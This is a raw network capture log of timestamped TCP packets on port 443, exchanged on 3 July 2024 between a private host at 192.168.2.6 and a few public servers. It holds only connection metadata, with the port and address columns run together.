                                                              Jul 3, 2024 09:41:06.637151003 CEST62931443192.168.2.6185.199.109.133
                                                              Jul 3, 2024 09:41:06.637160063 CEST44362931185.199.109.133192.168.2.6
                                                              Jul 3, 2024 09:41:06.637191057 CEST62931443192.168.2.6185.199.109.133
                                                              Jul 3, 2024 09:41:06.644763947 CEST44362931185.199.109.133192.168.2.6
                                                              Jul 3, 2024 09:41:06.644906998 CEST44362931185.199.109.133192.168.2.6
                                                              Jul 3, 2024 09:41:06.644957066 CEST62931443192.168.2.6185.199.109.133
                                                              Jul 3, 2024 09:41:06.644964933 CEST44362931185.199.109.133192.168.2.6
                                                              Jul 3, 2024 09:41:06.644984961 CEST44362931185.199.109.133192.168.2.6
                                                              Jul 3, 2024 09:41:06.645026922 CEST62931443192.168.2.6185.199.109.133
                                                              Jul 3, 2024 09:41:06.645503998 CEST62931443192.168.2.6185.199.109.133
                                                              Jul 3, 2024 09:41:06.645523071 CEST44362931185.199.109.133192.168.2.6
                                                              Jul 3, 2024 09:41:06.671523094 CEST62935443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:06.671562910 CEST44362935188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:06.671731949 CEST62935443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:06.672363997 CEST62935443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:06.672385931 CEST44362935188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:06.698636055 CEST62936443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:06.698673964 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:06.698889971 CEST62936443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:06.703686953 CEST62937443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:06.703732014 CEST44362937188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:06.704024076 CEST62937443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:06.704468012 CEST62936443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:06.704500914 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:06.705074072 CEST62937443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:06.705086946 CEST44362937188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:06.983208895 CEST62938443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:06.983234882 CEST4436293840.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:06.983386993 CEST62938443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:06.984285116 CEST62938443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:06.984297991 CEST4436293840.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:07.024571896 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.024619102 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.024647951 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.024693012 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.024703026 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.024713993 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.024750948 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.025244951 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.025289059 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.025302887 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.025316000 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.025342941 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.025387049 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.025393963 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.025521040 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.049176931 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049273014 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049474001 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.049498081 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049616098 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049698114 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.049705982 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049748898 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049777031 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049804926 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049834967 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049844980 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.049844980 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.049853086 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049886942 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049906969 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.049915075 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.049968004 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.056562901 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.056624889 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.056663036 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.056699991 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.056711912 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.056729078 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.056749105 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.056849003 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.056883097 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.056915998 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.056927919 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.056934118 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.056953907 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.084832907 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.113872051 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.113888025 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.124460936 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.124474049 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.153662920 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.159301043 CEST44362935188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.159542084 CEST62935443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.159553051 CEST44362935188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.160015106 CEST44362935188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.160677910 CEST62935443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.160765886 CEST44362935188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.160773993 CEST62935443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.160773993 CEST62935443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.160819054 CEST44362935188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.162441969 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.162784100 CEST62936443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.162795067 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.163124084 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.163410902 CEST62936443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.163472891 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.163589001 CEST62936443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.163608074 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.166759014 CEST44362937188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.166929007 CEST62937443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.166944027 CEST44362937188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.167946100 CEST44362937188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.168004990 CEST62937443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.168430090 CEST62937443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.168510914 CEST44362937188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.168622017 CEST62937443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.168628931 CEST44362937188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.168993950 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.196098089 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.196161032 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.196188927 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.196234941 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.196252108 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.196305037 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.196497917 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.196595907 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.196634054 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.196635962 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.196645021 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.196669102 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.197375059 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.197434902 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.197462082 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.197473049 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.197482109 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.197649002 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.197655916 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.198261023 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.198288918 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.198316097 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.198323011 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.198331118 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.198378086 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.198385000 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.198424101 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.199096918 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.202137947 CEST62935443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.217602015 CEST62937443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.217617035 CEST44362937188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.232760906 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.232892990 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.233009100 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.233019114 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.233035088 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.233088970 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.233095884 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.233616114 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.233671904 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.233676910 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.233691931 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.233736992 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.233741999 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.234384060 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.234416008 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.234458923 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.234463930 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.234472990 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.234529018 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.235105038 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.235265017 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.235323906 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.235330105 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.235337973 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.235385895 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.235389948 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.235399961 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.235433102 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.235706091 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.235734940 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.235764980 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.235764980 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.235776901 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.235898972 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.236128092 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.236145973 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.236171007 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.236233950 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.236287117 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.236354113 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.236363888 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.236917973 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.236944914 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.236967087 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.236977100 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.237035990 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.237746000 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.237802029 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.237828016 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.237910986 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.237920046 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.238044024 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.238514900 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.238565922 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.238646030 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.238662004 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.239341021 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.239367962 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.239402056 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.239411116 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.239499092 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.247973919 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.259083033 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.259130001 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.259341002 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.259356022 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.263067961 CEST62937443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.279422045 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.279442072 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.294331074 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.294406891 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.294420004 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.310878038 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.319591045 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.319645882 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.319662094 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.368304014 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.368391037 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.368566036 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.368731976 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.368750095 CEST44362933188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.368760109 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.368799925 CEST62933443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.372421980 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.427316904 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427393913 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427434921 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427453041 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.427470922 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427506924 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427519083 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.427525043 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427581072 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.427587032 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427661896 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427707911 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427716017 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427742958 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.427748919 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427792072 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.427795887 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.427999973 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428051949 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428090096 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428118944 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428153992 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428172112 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.428189993 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428210974 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.428236961 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.428457975 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428540945 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428605080 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.428613901 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428631067 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428678989 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.428687096 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428699970 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428730011 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.428734064 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428746939 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.428797960 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.428803921 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.429403067 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.429434061 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.429558039 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.429579020 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.429579020 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.429589033 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.429610014 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.429619074 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.429647923 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.429694891 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.429699898 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.430293083 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.430326939 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.430368900 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.430377960 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.430397034 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.430507898 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.430558920 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.430565119 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.430572033 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.430594921 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.430612087 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.430617094 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.430643082 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.430665016 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.431227922 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.431289911 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.431293011 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.431305885 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.431366920 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.431458950 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.431521893 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.431529045 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.431581020 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.431602955 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.431638002 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.432145119 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.432220936 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.432609081 CEST62934443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.432625055 CEST44362934188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.515427113 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.515475035 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.515503883 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.515513897 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.515532970 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.515557051 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.515597105 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.515614986 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.515676022 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.515676022 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.515686035 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.560142040 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.615869045 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.615926981 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.615937948 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.615957022 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.616029978 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.616322994 CEST62932443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.616345882 CEST44362932188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.652837038 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.653225899 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.653279066 CEST62936443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.653290033 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.653341055 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.653414965 CEST62936443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.655165911 CEST62936443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.655183077 CEST44362936188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:07.659149885 CEST62940443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:07.659188032 CEST44362940188.114.96.3192.168.2.6
